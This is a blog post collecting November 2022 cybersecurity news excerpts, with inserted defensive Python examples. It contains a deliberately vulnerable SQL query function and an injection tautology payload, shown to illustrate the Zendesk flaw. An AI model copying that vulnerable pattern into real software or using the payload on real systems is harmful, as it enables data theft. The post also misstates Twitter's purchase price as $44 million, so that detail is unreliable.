Cyber security news November 2022

This posting is here to collect cyber security news in November 2022.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

349 Comments

  1. Tomi Engdahl says:

    Phishing drops IceXLoader malware on thousands of home, corporate devices https://www.bleepingcomputer.com/news/security/phishing-drops-icexloader-malware-on-thousands-of-home-corporate-devices/
    An ongoing phishing campaign has infected thousands of home and corporate users with a new version of the ‘IceXLoader’ malware. The authors of IceXLoader, a malware loader first spotted in the wild this summer, have released version 3.3.3, enhancing the tool’s functionality and introducing a multi-stage delivery chain.

    Reply
  2. Tomi Engdahl says:

    US Health Dept warns of Venus ransomware targeting healthcare orgs https://www.bleepingcomputer.com/news/security/us-health-dept-warns-of-venus-ransomware-targeting-healthcare-orgs/
    The U.S. Department of Health and Human Services (HHS) warned today that Venus ransomware attacks are also targeting the country’s healthcare organizations. In an analyst note issued by the Health Sector Cybersecurity Coordination Center (HC3), HHS’ security team also mentions that it knows about at least one incident where Venus ransomware was deployed on the networks of a U.S. healthcare org.
    However, there is no known data leak site that threat actors deploying Venus ransomware are known to use for publishing stolen data online, according to HC3’s report.

    Reply
  3. Tomi Engdahl says:

    Australian Federal Police say cybercriminals in Russia behind Medibank hack https://therecord.media/australian-federal-police-say-cybercriminals-in-russia-behind-medibank-hack/
    The Australian Federal Police (AFP) has identified the perpetrators of the hack and attempted extortion of health insurance company Medibank, its commissioner told journalists on Friday. Giving a short press conference without taking questions, AFP Commissioner Reece Kershaw said the force was “undertaking covert measures and working around the clock with our domestic agencies and our international networks, including INTERPOL,” as part of its investigation. “This is important because we believe that those responsible for the breach are in Russia,” Kershaw said, explaining that the AFP’s “intelligence points to a group of loosely affiliated cyber criminals, who are likely responsible for past significant breaches in countries across the world.”

    ‘Hunt down the scumbags’: Australian government to ‘hack the hackers’ behind Medibank breach
    https://www.sbs.com.au/news/article/hunt-down-the-scumbags-100-officers-working-on-medibank-optus-hacks-australian-government-says/rvi3iqq3i
    The Australian government is going to “hunt down the scumbags” responsible for the Medibank hack that compromised the private information of nearly 10 million customers, cyber security minister Clare O’Neil said. On Friday, the Australian Federal Police (AFP) announced that Russian cyber criminals were responsible for the Medibank hack. The Russian embassy in Australia said it was disappointed that the AFP had identified Russia-based criminals as the culprits without contacting Russian officials before the public announcement. “We encourage the AFP to duly get in touch with the respective Russian law enforcement agencies,” the consulate said in a statement on Friday evening.

    Reply
  4. Tomi Engdahl says:

    Apple Sued for Allegedly Deceiving Users With Privacy Settings
    https://gizmodo.com/apple-iphone-privacy-analytics-class-action-suit-1849774313
    Apple is facing a class action lawsuit for allegedly harvesting iPhone user data even when the company’s own privacy settings promise not to.
    The suit, filed Thursday in California federal court, comes days after Gizmodo exclusively reported on research into how multiple iPhone apps send Apple analytics data, regardless of whether the iPhone Analytics privacy setting is turned on or off. The problem was spotted by two independent researchers at the software company Mysk, who found that the Apple App Store sends the company exhaustive information about nearly everything a user does in the app, despite a privacy setting, iPhone Analytics, which claims to “disable the sharing of Device Analytics altogether” when switched off. Gizmodo asked the researchers to run additional tests on other iPhone apps, including Apple Music, Apple TV, Books, and Stocks. The researchers found that the problem persists across most of Apple’s suite of built-in iPhone apps.

    Reply
  5. Tomi Engdahl says:

    Ukraine says Russian hacktivists use new Somnia ransomware https://www.bleepingcomputer.com/news/security/ukraine-says-russian-hacktivists-use-new-somnia-ransomware/
    Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called ‘Somnia’, encrypting their systems and causing operational problems. The Computer Emergency Response Team of Ukraine (CERT-UA) has confirmed the outbreak via an announcement on its portal, attributing the attacks to ‘From Russia with Love’ (FRwL), also known as ‘Z-Team’, whom they track as UAC-0118. The group previously disclosed creating the Somnia ransomware on Telegram and even posted evidence of attacks against tank producers in Ukraine.

    Reply
  6. Tomi Engdahl says:

    Android phone owner accidentally finds a way to bypass lock screen https://www.bleepingcomputer.com/news/security/android-phone-owner-accidentally-finds-a-way-to-bypass-lock-screen/
    Cybersecurity researcher David Schütz accidentally found a way to bypass the lock screen on his fully patched Google Pixel 6 and Pixel 5 smartphones, enabling anyone with physical access to the device to unlock it. Exploiting the vulnerability to bypass the lock screen on Android phones is a simple five-step process that wouldn’t take more than a few minutes. Google has fixed the security issue on the latest Android update released last week, but it has remained available for exploitation for at least six months.

    Reply
  7. Tomi Engdahl says:

    https://www.securityweek.com/twitter-security-chief-resigns-musk-sparks-deep-concern

    A top security officer for Twitter resigned on Thursday as new owner Elon Musk’s revamp of the platform saw a boomlet of fake accounts, drawing a rare warning from US regulators.

    “I’ve made the hard decision to leave Twitter,” tweeted chief security officer Lea Kissner, who reportedly stepped down with other key privacy or security executives.

    The walk-outs came a day after the chaotic launch of new features introduced by Musk following his $44 million buyout of the influential one-to-many messaging app.

    Reply
  8. Tomi Engdahl says:

    Cisco Patches 33 Vulnerabilities in Enterprise Firewall Products
    https://www.securityweek.com/cisco-patches-33-vulnerabilities-enterprise-firewall-products

    Cisco this week announced the release of patches for 33 high- and medium-severity vulnerabilities impacting enterprise firewall products running Cisco Adaptive Security Appliance (ASA), Firepower Threat Defense (FTD), and Firepower Management Center (FMC) software.

    The most severe of the security defects is CVE-2022-20927, a bug in the dynamic access policies (DAP) functionality of ASA and FTD software, allowing a remote, unauthenticated attacker to cause a denial-of-service (DoS) condition.

    Due to improper processing of data received from the Posture (HostScan) module, an attacker could send crafted HostScan data to cause the affected device to reload, Cisco explains.

    Equally severe (CVSS score of 8.6) is CVE-2022-20946, a DoS vulnerability in the generic routing encapsulation (GRE) tunnel decapsulation feature of FTD software releases 6.3.0 and later.

    The issue exists because of memory handling errors during the processing of GRE traffic. An attacker can exploit the flaw by sending crafted GRE payloads through an affected device, causing it to restart.

    Three other high-severity DoS vulnerabilities that Cisco resolved this week impact the Simple Network Management Protocol (SNMP) feature and the SSL/TLS client of ASA and FTD, and the processing of SSH connections of FMC and FTD.

    Reply
  9. Tomi Engdahl says:

    Manish Singh / TechCrunch:
    VideoLAN confirms India’s Ministry of Electronics and IT has removed its ban on downloading the VLC media player, in effect for over nine months

    India lifts download ban on VLC
    https://techcrunch.com/2022/11/14/india-lifts-download-ban-on-vlc/

    India has lifted the download ban on VLC, more than nine months after it mysteriously blocked the official website of the popular media playback software in the South Asian market. VideoLAN, the popular software’s developer, filed a legal notice last month seeking an explanation from the nation’s IT and Telecom ministries for the block order.

    The Ministry of Electronics and IT has removed its ban on the website of VLC media player, New Delhi-based advocacy group Internet Freedom Foundation, which provided legal support to VideoLAN, said on Monday. VideoLAN confirmed the order.

    “This ban was put into place without any prior notice and without giving VideoLAN the opportunity of a hearing, which went against the 2009 Blocking Rules and the law laid down by the Supreme Court in Shreya Singhal v. Union of India. This was strange because VLC Media Player is an open-source software which is used by nearly 80 million Indians,” IFF said in a statement.

    The vast majority of people rely on VLC’s official website to download the popular application.

    “Most major ISPs [internet service providers] are banning the site, with diverse techniques,” Kempf said of the blocking in India. In light of the blocking, the site immediately observed a drop of 80% in traffic from the South Asian market, he told TechCrunch.

    Security firm Symantec reported in April this year that the hacker group Cicada, which has ties with the Chinese government, was exploiting VLC Media Player as well as several other popular applications to gain remote access to the victim’s computers. Kempf said he was never contacted by any government agency.

    VLC, downloaded over 3.5 billion times worldwide, is a local media player that doesn’t require internet access or connection to any particular service online for the vast majority of its features. A block on its website didn’t considerably impact the existing install base of VLC.

    But by blocking the website, India was pushing its citizens to “shady websites that are running hacked version of VLC. So they are endangering their own citizens with this ban,” Kempf warned.

    Reply
  10. Tomi Engdahl says:

    New “Earth Longzhi” APT Targets Ukraine and Asian Countries with Custom Cobalt Strike Loaders https://thehackernews.com/2022/11/new-earth-longzhi-apt-targets-ukraine.html
    Entities located in East and Southeast Asia as well as Ukraine have been targeted at least since 2020 by a previously undocumented subgroup of APT41, a prolific Chinese advanced persistent threat (APT). Cybersecurity firm Trend Micro, which christened the espionage crew Earth Longzhi, said the actor’s long-running campaign can be split into two based on the toolset deployed to attack its victims.
    The first wave from May 2020 to February 2021 is said to have targeted government, infrastructure, and healthcare industries in Taiwan and the banking sector in China, whereas the succeeding set of intrusions from August 2021 to June 2022 infiltrated high-profile victims in Ukraine and several countries in Asia. This included defense, aviation, insurance, and urban development industries in Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine.

    Reply
  11. Tomi Engdahl says:

    Typhon Reborn With New Capabilities
    https://unit42.paloaltonetworks.com/typhon-reborn-stealer/
    In early August 2022, Cyble Research Labs (a cybercrime monitoring service) uncovered a new crypto miner/stealer for hire that the malware author named Typhon Stealer. Shortly thereafter, they released an updated version called Typhon Reborn. Both versions have the ability to steal crypto wallets, monitor keystrokes in sensitive applications and evade antivirus products. This new version has increased anti-analysis techniques and more malicious features. The threat actors have also improved their stealer and file grabber features.

    Reply
  12. Tomi Engdahl says:

    New KmsdBot Malware Hijacking Systems for Mining Crypto and Launch DDoS Attacks https://thehackernews.com/2022/11/new-kmsdbot-malware-hijacking-systems.html
    A newly discovered evasive malware leverages the Secure Shell (SSH) cryptographic protocol to gain entry into targeted systems with the goal of mining cryptocurrency and carrying out distributed denial-of-service (DDoS) attacks. Dubbed KmsdBot by the Akamai Security Intelligence Response Team (SIRT), the Golang-based malware has been found targeting a variety of companies ranging from gaming to luxury car brands to security firms. “The botnet infects systems via an SSH connection that uses weak login credentials,” Akamai researcher Larry W. Cashdollar said. “The malware does not stay persistent on the infected system as a way of evading detection.”

    Reply
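    The report above describes two things a defender can look for in host logs: password-based SSH logins that succeed only after repeated failures from the same source, and the absence of any persistence afterwards, which makes the authentication log one of the few artifacts left. The following is an added example for this thread, not code from Akamai or BleepingComputer. It parses constructed sshd-style log lines and flags source addresses whose password failures were followed by an accepted password login; the log lines, hostnames and addresses are made up for the example.

    ```python
    """Flag SSH password guessing that ends in a successful login (added example)."""
    import re
    from collections import defaultdict

    # Constructed sample log lines in the common sshd auth.log format (not from any real host).
    SAMPLE_LOG = """\
    Nov 14 02:11:01 web1 sshd[4121]: Failed password for root from 203.0.113.7 port 51222 ssh2
    Nov 14 02:11:03 web1 sshd[4121]: Failed password for root from 203.0.113.7 port 51222 ssh2
    Nov 14 02:11:05 web1 sshd[4123]: Failed password for admin from 203.0.113.7 port 51230 ssh2
    Nov 14 02:11:09 web1 sshd[4125]: Failed password for admin from 203.0.113.7 port 51241 ssh2
    Nov 14 02:11:12 web1 sshd[4127]: Accepted password for admin from 203.0.113.7 port 51250 ssh2
    Nov 14 02:15:40 web1 sshd[4201]: Accepted publickey for deploy from 198.51.100.20 port 40122 ssh2
    Nov 14 02:16:02 web1 sshd[4210]: Failed password for backup from 198.51.100.33 port 39001 ssh2
    """

    # Matches both "Failed password for alice from ..." and "Failed password for invalid user bob from ...".
    LINE_RE = re.compile(
        r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
        r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
    )


    def parse_sshd(log_text):
        """Yield (result, method, user, ip) for every line that is an sshd auth event."""
        for line in log_text.splitlines():
            m = LINE_RE.search(line)
            if m:
                yield m.group("result"), m.group("method"), m.group("user"), m.group("ip")


    def find_guessed_logins(log_text, min_failures=3):
        """Return {ip: {"failures": n, "users_tried": [...], "accepted_as": user}} for
        source IPs that accumulated at least min_failures password failures and were then
        accepted with a password. Key-based logins are ignored: they are not guessing."""
        failures = defaultdict(int)
        users = defaultdict(list)
        hits = {}
        for result, method, user, ip in parse_sshd(log_text):
            if method != "password":
                continue
            if result == "Failed":
                failures[ip] += 1
                if user not in users[ip]:
                    users[ip].append(user)
            elif failures[ip] >= min_failures:
                hits[ip] = {
                    "failures": failures[ip],
                    "users_tried": list(users[ip]),
                    "accepted_as": user,
                }
        return hits


    if __name__ == "__main__":
        for ip, info in find_guessed_logins(SAMPLE_LOG).items():
            print(f"{ip}: {info['failures']} failed guesses over {info['users_tried']}, "
                  f"then accepted as {info['accepted_as']}")
    ```

    The threshold is deliberately low because a loader that does not persist leaves little else to correlate; on a real fleet the same function would be pointed at forwarded journald or syslog output, and a hit is a reason to check that host for a running miner even though nothing was installed to survive a reboot.
    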
  13. Tomi Engdahl says:

    Whoosh confirms data breach after hackers sell 7.2M user records https://www.bleepingcomputer.com/news/security/whoosh-confirms-data-breach-after-hackers-sell-72m-user-records/
    The Russian scooter-sharing service Whoosh has confirmed a data breach after hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. Whoosh is Russia’s leading urban mobility service platform, operating in 40 cities with over 75,000 scooters. On Friday, a threat actor began selling the stolen data on a hacking forum, which allegedly contains promotion codes that can be used to access the service for free, as well as partial user identification and payment card data. The company confirmed the cyberattack via statements on Russian media earlier this month but claimed that its IT experts had managed to thwart it successfully.

    Reply
  14. Tomi Engdahl says:

    Police struck at online fraudsters: 59 arrested. Here are 3 threats lurking for shoppers https://www.is.fi/digitoday/tietoturva/art-2000009200663.html
    EUROPOL reports on an operation that ran through October, in which 59 suspected fraudsters were arrested. The crackdown, covering 19 countries including Finland, broke up criminal networks that used stolen credit card details to make purchases in online shops. Authorities carried out searches at the locations to which the illegally purchased goods had been delivered. In addition to the arrests, the goods were seized, and the evidence is expected to help in bringing charges against the suspects. Investigations continue in several countries, and more arrests may follow. The operation was part of the 2022 e-Commerce Action, or eComm 2022, project.

    Reply
  15. Tomi Engdahl says:

    https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentication-breaks-after-november-updates/
    Windows Kerberos authentication breaks after November updates.
    Microsoft is investigating a new known issue causing enterprise domain controllers to experience Kerberos sign-in failures and other authentication problems after installing cumulative updates released during this month’s Patch Tuesday. Kerberos has replaced the NTLM protocol as the default authentication protocol for domain-connected devices on all Windows versions above Windows 2000. BleepingComputer readers also reported three days ago that the November updates break Kerberos “in situations where you have set the ‘This account supports Kerberos AES 256 bit encryption’ or ‘This account supports Kerberos AES 128 bit encryption’ Account Options set (i.e., msDS-SupportedEncryptionTypes attribute) on user accounts in AD.”

    Reply
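    The reader reports above single out accounts whose msDS-SupportedEncryptionTypes attribute has the AES account options set, so the practical first step before or after installing the update is to inventory which accounts match. The following is an added example for this thread, not code from Microsoft or BleepingComputer. The bit values are the documented flags of the msDS-SupportedEncryptionTypes attribute; the account records are constructed, and in a real environment they would come from an LDAP query of the directory, which is assumed rather than shown.

    ```python
    """Decode msDS-SupportedEncryptionTypes and list accounts with AES options set (added example)."""

    # Documented bit values of the msDS-SupportedEncryptionTypes attribute.
    ENC_FLAGS = {
        0x01: "DES-CBC-CRC",
        0x02: "DES-CBC-MD5",
        0x04: "RC4-HMAC",
        0x08: "AES128-CTS-HMAC-SHA1-96",
        0x10: "AES256-CTS-HMAC-SHA1-96",
    }
    # The two "This account supports Kerberos AES ... bit encryption" checkboxes map to these bits.
    AES_MASK = 0x08 | 0x10


    def decode_enc_types(value):
        """Return the cipher names enabled in a raw attribute value; None or 0 means not set."""
        if not value:
            return []
        return [name for bit, name in ENC_FLAGS.items() if value & bit]


    def triage_accounts(accounts):
        """Split (sAMAccountName, attribute value) pairs into accounts with an AES option set,
        i.e. the condition the readers reported as breaking after the update, and the rest."""
        affected, unaffected = [], []
        for name, value in accounts:
            entry = {"account": name, "enc_types": decode_enc_types(value)}
            if value and value & AES_MASK:
                affected.append(entry)
            else:
                unaffected.append(entry)
        return affected, unaffected


    # Constructed sample directory data (not from any real domain).
    SAMPLE_ACCOUNTS = [
        ("svc-sql", 0x18),     # AES128 + AES256 checked
        ("svc-backup", 0x10),  # AES256 only
        ("legacy-app", 0x04),  # RC4 only
        ("jdoe", None),        # attribute absent: the domain controller default applies
        ("svc-web", 0x1C),     # RC4 + AES128 + AES256
    ]

    if __name__ == "__main__":
        affected, unaffected = triage_accounts(SAMPLE_ACCOUNTS)
        print("Accounts with AES options set (check these first):")
        for e in affected:
            print(f"  {e['account']}: {', '.join(e['enc_types'])}")
        print(f"{len(unaffected)} other accounts")
    ```

    Feeding the function from a directory export is the only environment-specific part; the decoding itself is the same whether the values come from an LDAP search, a CSV export or a ticket someone pasted.
    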
  16. Tomi Engdahl says:

    “The long, solder-heavy way to get root access to a Starlink terminal” Still remains theoretical.

    The long, solder-heavy way to get root access to a Starlink terminal
    https://arstechnica.com/gadgets/2022/11/the-long-solder-heavy-way-to-get-root-access-to-a-starlink-terminal/

    Zapping the satellite board at just the right time can grant deeper access.

    Getting root access inside one of Starlink’s dishes requires a few things that are hard to come by: a deep understanding of board circuitry, eMMC dumping hardware and skills, bootloader software understanding, and a custom PCB board. But researchers have proven it can be done.

    In their talk “Glitched on Earth by Humans: A Black-Box Security Evaluation of the SpaceX Starlink User Terminal,” researchers at KU Leuven in Belgium detailed at Black Hat 2022 earlier this year how they were able to execute arbitrary code on a Starlink User Terminal (i.e., a dish board) using a custom-built modchip through a voltage fault injection. The talk took place in August, but the researchers’ slides and repository have recently made the rounds.

    https://github.com/KULeuven-COSIC/Starlink-FI

    Reply
  17. Tomi Engdahl says:

    Aiphone Intercom System Vulnerability Allows Hackers to Open Doors
    https://www.securityweek.com/aiphone-intercom-system-vulnerability-allows-hackers-open-doors

    A vulnerability in Aiphone intercom products allows attackers to breach the entry system and gain access to the building that uses it.

    Aiphone is one of the largest global manufacturers of intercom systems, including audio and video entry systems for residential and corporate buildings.

    Last week, researchers with Norwegian application security firm Promon published information on a vulnerability identified in several Aiphone products that could allow an attacker to easily breach the entry system using an NFC tag.

    The security bug is tracked as CVE-2022-40903 and is described as an information disclosure vulnerability.

    The issue was identified in June 2021 and impacts Aiphone device series GT-DMB, GT-DMB-N, and GT-DMB-LVN running firmware versions prior to 3.00, and GT-DB-VN devices running firmware version 2.00 or earlier.

    Promon says that the bug allows an attacker to “use a mobile device with NFC capability to run a brute-force attack on the entry system” in order to find the admin passcode.

    Essentially, the system allows an attacker with network access to try every possible four-digit code combination to discover the admin passcode, Promon said, responding to a SecurityWeek inquiry.

    According to Promon, “the exploit requires a modification app (a custom Android NFC host-based emulation app that mimics the behavior of the official administrative tool).”

    Once they know the administrator passcode, the attacker can use it to add a new NFC tag into the system (by injecting the device’s serial number), for access into the building.

    Given that the vulnerable Aiphone products do not store access logs, an organization may be unaware of any unauthorized access, as there would be no evidence of it on the device.

    “Unfortunately, there’s no way of knowing if a device has been targeted by this type of attack,” Promon said.

    Reply
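    The report above comes down to two missing controls: the passcode check accepts unlimited guesses, and the device keeps no log that would show the guessing happened. The following is an added example for this thread, not code from Aiphone or Promon, and it says nothing about how the real intercom firmware works. It shows a generic passcode verifier with a doubling lockout and an audit trail, with the clock injected so the lockout can be exercised without waiting.

    ```python
    """Passcode verifier with attempt throttling and an audit trail (added example)."""
    import hmac
    import time


    class PinVerifier:
        def __init__(self, pin, max_attempts=5, base_lockout=30, clock=time.monotonic):
            self._pin = pin.encode()
            self.max_attempts = max_attempts
            self.base_lockout = base_lockout  # seconds
            self.clock = clock                # injectable for tests; real code uses monotonic time
            self.failures = 0
            self.locked_until = 0.0
            self.audit = []                   # (timestamp, event, detail) records

        def verify(self, attempt):
            """Return True only for the correct passcode outside a lockout window."""
            now = self.clock()
            if now < self.locked_until:
                self.audit.append((now, "rejected_locked", round(self.locked_until - now)))
                return False
            ok = hmac.compare_digest(self._pin, attempt.encode())  # constant-time compare
            if ok:
                self.audit.append((now, "accepted", None))
                self.failures = 0
                return True
            self.failures += 1
            self.audit.append((now, "failed", self.failures))
            if self.failures % self.max_attempts == 0:
                # Doubling lockout: the first 5 wrong guesses cost 30 s, the next 5 cost 60 s,
                # and so on, so walking all 10,000 four-digit codes stops being a matter of minutes.
                rounds = self.failures // self.max_attempts
                lockout = self.base_lockout * 2 ** (rounds - 1)
                self.locked_until = now + lockout
                self.audit.append((now, "locked", lockout))
            return False

        def events(self, kind):
            """Audit entries of one kind, for an operator reviewing the device."""
            return [e for e in self.audit if e[1] == kind]


    if __name__ == "__main__":
        v = PinVerifier("4821")  # constructed sample passcode
        for guess in ("0000", "0001", "0002", "0003", "0004", "4821"):
            print(guess, v.verify(guess))
        print(v.events("locked"))
    ```

    The audit list stands in for whatever persistent log the device can write; the point is that both the guessing and the lockout leave records an operator can review, which is exactly what the report says the affected products lack.
    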
  18. Tomi Engdahl says:

    Thales Denies Getting Hacked as Ransomware Gang Releases Gigabytes of Data
    https://www.securityweek.com/thales-denies-getting-hacked-ransomware-gang-releases-gigabytes-data

    French aerospace, defense, and security giant Thales claims to have found no evidence of its IT systems getting breached after a well-known ransomware group published gigabytes of data allegedly stolen from the company.

    The cybercrime group LockBit last week published a 9.5 Gb archive file apparently containing information belonging to Thales. The malicious hackers previously announced that they would make files public unless Thales paid a ransom.

    The leaked files seem to include both technical and corporate documents. The hackers claim to have obtained highly sensitive information related to the company’s operations, as well as “commercial documents, accounting files, customer files, drawings of clients structures, [and] softwares”.

    Thales did confirm that a breach had occurred, just not of its own systems. Its security experts are aware of two likely sources of the theft. One of them has been confirmed to be the user account of a partner on a dedicated collaboration portal, which resulted in the disclosure of “a limited amount of information”.

    https://www.thalesgroup.com/en/worldwide/group/press_release/thales-position-lockbit-30

    Reply
  19. Tomi Engdahl says:

    https://www.wired.com/story/twitter-two-factor-sms-problems/amp
    Twitter’s SMS Two-Factor Authentication Is Melting Down
    Problems with the important security feature may be some of the first signs that Elon Musk’s social network is fraying at the edges.

    Following two weeks of extreme chaos at Twitter, users are joining and fleeing the site in droves. More quietly, many are likely scrutinizing their accounts, checking their security settings, and downloading their data. But some users are reporting problems when they attempt to generate two-factor authentication codes over SMS: Either the texts don’t come or they’re delayed by hours.

    The glitchy SMS two-factor codes mean that users could get locked out of their accounts and lose control of them. They could also find themselves unable to make changes to their security settings or download their data using Twitter’s access feature. The situation also provides an early hint that troubles within Twitter’s infrastructure are bubbling to the surface.

    Not all users are having problems receiving SMS authentication codes, and those who rely on an authenticator app or physical authentication token to secure their Twitter account may not have reason to test the mechanism.

    The meltdown comes less than two weeks after Twitter laid off about half of its workers, roughly 3,700 people. Since then, engineers, operations specialists, IT staff, and security teams have been stretched thin attempting to adapt Twitter’s offerings and build new features per new owner Elon Musk’s agenda.

    Reply
  20. Tomi Engdahl says:

    Researchers Say China State-backed Hackers Breached a Digital Certificate Authority https://thehackernews.com/2022/11/researchers-say-china-state-backed.html
    A suspected Chinese state-sponsored actor breached a digital certificate authority as well as government and defense agencies located in different countries in Asia as part of an ongoing campaign since at least March 2022. Symantec, by Broadcom Software, linked the attacks to an adversarial group it tracks under the name Billbug, citing the use of tools previously attributed to this actor. The activity appears to be driven by espionage and data-theft, although no data is said to have been stolen to date. “The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines,” Symantec researchers said in a report shared with The Hacker News.

    Reply
  21. Tomi Engdahl says:

    DTrack activity targeting Europe and Latin America https://securelist.com/dtrack-targeting-europe-latin-america/107798/
    DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the backdoor remains in use three years later. It is used by the Lazarus group against a wide variety of targets. For example, we’ve seen it being used in financial environments where ATMs were breached, in attacks on a nuclear power plant and also in targeted ransomware attacks. Essentially, anywhere the Lazarus group believes they can achieve some financial gain. According to KSN telemetry, SecureList has detected DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey and the United States, indicating that DTrack is spreading into more parts of the world. The targeted sectors are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers and telecommunications.

    Reply
  22. Tomi Engdahl says:

    Mastodon users vulnerable to password-stealing attacks https://portswigger.net/daily-swig/mastodon-users-vulnerable-to-password-stealing-attacks
    Attackers could steal password credentials from Mastodon users due to a vulnerability in Glitch, a fork of Mastodon, a researcher has warned. Mastodon has risen in popularity in recent weeks, as many users moved to the social media platform as a replacement for Twitter, recently acquired by controversial businessman Elon Musk. “Everybody on infosec Twitter seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about,” Gareth Heyes, of PortSwigger Research, wrote in a blog post released today. Heyes found he was able to steal users’ stored credentials using Chrome’s autofill feature by tricking them into clicking a malicious element he had disguised as a toolbar.

    Reply
  23. Tomi Engdahl says:

    Nasty SQL Injection Bug in Zendesk Endangers Sensitive Customer Data https://www.darkreading.com/cloud/nasty-sql-injection-bug-zendesk-endangers-sensitive-customer-data
    Multiple security vulnerabilities in Zendesk’s Web-based customer relationship management (CRM) platform could have allowed attackers to access sensitive information from potentially any customer account, a discovery that showcases application programming interface (API) endpoint weaknesses in enterprise software-as-a-service (SaaS) applications. Researchers from Varonis Threat Labs discovered the issues, specifically an SQL injection vulnerability and a logical access flaw in Zendesk Explore, a component of Zendesk’s platform, they said in a blog post published Nov. 15. Researchers found they could use the flaws to extract data from Zendesk Explore, including the list of tables from Zendesk’s relational database service (RDS) instance as well as all the information stored in the database. That info included email addresses of users, sales leads, deals from the CRM, live agent conversations, tickets, help center articles, and more, they said.

    Zendesk Vulnerability Could Have Given Hackers Access to Customer Data
    https://www.securityweek.com/zendesk-vulnerability-could-have-given-hackers-access-customer-data

    An SQL injection vulnerability in Zendesk Explore could have allowed a threat actor to leak Zendesk customer account information, data security firm Varonis reports.

    Zendesk Explore is the analytics and reporting service of Zendesk, a popular customer support software-as-a-service solution.

    According to Varonis, two vulnerabilities in Zendesk Explore could have allowed an attacker to access conversations, comments, email addresses, tickets, and other information stored in Zendesk accounts with Explore enabled.

    The two issues, however, were reported to Zendesk and patched before they could have any impact on customer data.

    “There is no evidence that any Zendesk Explore customer accounts were exploited, and Zendesk started working on a fix the same day it was reported. The company fixed multiple bugs in less than one workweek with zero customer action required,” Varonis reports.

    Reply
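    The two reports above describe the classic failure mode of a reporting backend: a caller-controlled value is pasted into the query text, so a filter meant to scope results to one customer account can be turned into a filter that matches every account. The following is an added example for this thread, not Zendesk’s or Varonis’s code, and it says nothing about how Zendesk Explore is actually built. An in-memory SQLite database with constructed rows stands in for the reporting store, and the two functions show the string-built query beside its parameterized replacement.

    ```python
    """String-built vs parameterized account filter on a toy reporting store (added example)."""
    import sqlite3


    def make_db():
        """Constructed sample data: tickets from two tenant accounts."""
        conn = sqlite3.connect(":memory:")
        conn.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, account TEXT, subject TEXT)")
        conn.executemany(
            "INSERT INTO tickets(account, subject) VALUES (?, ?)",
            [("acme", "Login broken"), ("acme", "Invoice question"), ("globex", "Refund")],
        )
        return conn


    def tickets_vulnerable(conn, account):
        """The caller's value becomes SQL syntax: a quote in it rewrites the WHERE clause."""
        sql = f"SELECT subject FROM tickets WHERE account = '{account}' ORDER BY id"
        return [row[0] for row in conn.execute(sql)]


    def tickets_safe(conn, account):
        """The caller's value is bound as data; the driver never parses it as SQL."""
        rows = conn.execute(
            "SELECT subject FROM tickets WHERE account = ? ORDER BY id", (account,)
        )
        return [row[0] for row in rows]


    # A tautology in the account field: harmless as data, a cross-tenant filter as SQL.
    INJECTED_ACCOUNT = "x' OR 'a'='a"

    if __name__ == "__main__":
        conn = make_db()
        print("legitimate, vulnerable:", tickets_vulnerable(conn, "acme"))
        print("injected,   vulnerable:", tickets_vulnerable(conn, INJECTED_ACCOUNT))
        print("injected,   safe:      ", tickets_safe(conn, INJECTED_ACCOUNT))
    ```

    The parameterized version returns nothing for the crafted value because no account is literally named that way, which is the behaviour a tenant-scoped report should have. The same discipline applies to table or column names that cannot be bound as parameters: those must be validated against an allow-list rather than interpolated.
    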
  25. Tomi Engdahl says:

    Google to roll out Privacy Sandbox on Android 13 starting early 2023 https://www.bleepingcomputer.com/news/security/google-to-roll-out-privacy-sandbox-on-android-13-starting-early-2023/
    Google announced today that they will begin rolling out the Privacy Sandbox system on a limited number of Android 13 devices starting in early 2023. The Privacy Sandbox for Android is a set of technologies Google introduced in February this year, aiming to limit the tracking of users while still providing advertisers with viable performance-measurement options. Since then, Google has debated various design proposals with app developers and marketers, refining the system and readying its components for tentative deployment.
    “Beginning early next year, we plan to roll out the initial Privacy Sandbox Beta to Android 13 mobile devices so that developers can take the next steps in testing these new solutions,” mentions today’s press release.

    Reply
  26. Tomi Engdahl says:

    Top Zeus Botnet Suspect “Tank” Arrested in Geneva https://krebsonsecurity.com/2022/11/top-zeus-botnet-suspect-tank-arrested-in-geneva/
    Vyacheslav “Tank” Penchukov, the accused 40-year-old Ukrainian leader of a prolific cybercriminal group that stole tens of millions of dollars from small to mid-sized businesses in the United States and Europe, has been arrested in Switzerland, according to multiple sources. Penchukov was named in a 2014 indictment by the U.S. Department of Justice as a top figure in the JabberZeus Crew, a small but potent cybercriminal collective from Ukraine and Russia that attacked victim companies with a powerful, custom-made version of the Zeus banking trojan. The U.S. Federal Bureau of Investigation (FBI) declined to comment for this story. But according to multiple sources, Penchukov was arrested in Geneva, Switzerland roughly three weeks ago as he was traveling to meet up with his wife there.

    Reply
  27. Tomi Engdahl says:

    Chinese Cyberespionage Group ‘Billbug’ Targets Certificate Authority
    https://www.securityweek.com/chinese-cyberespionage-group-billbug-targets-certificate-authority

    A Chinese state-sponsored cyberespionage group tracked as Billbug has been observed targeting a certificate authority in Asia, along with other entities, Symantec reports.

    Also tracked as Lotus Blossom and Thrip, Billbug is an advanced persistent threat (APT) actor mainly targeting entities in Southeast Asia and the United States. It’s believed to have been active since at least 2009.

    Starting March 2022, the group has been targeting multiple entities in Asia, including a certificate authority, a government organization, and defense agencies.

    “The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic,” Symantec notes.

    According to the security company, however, there is no evidence to suggest that the threat actor has managed to successfully compromise digital certificates.

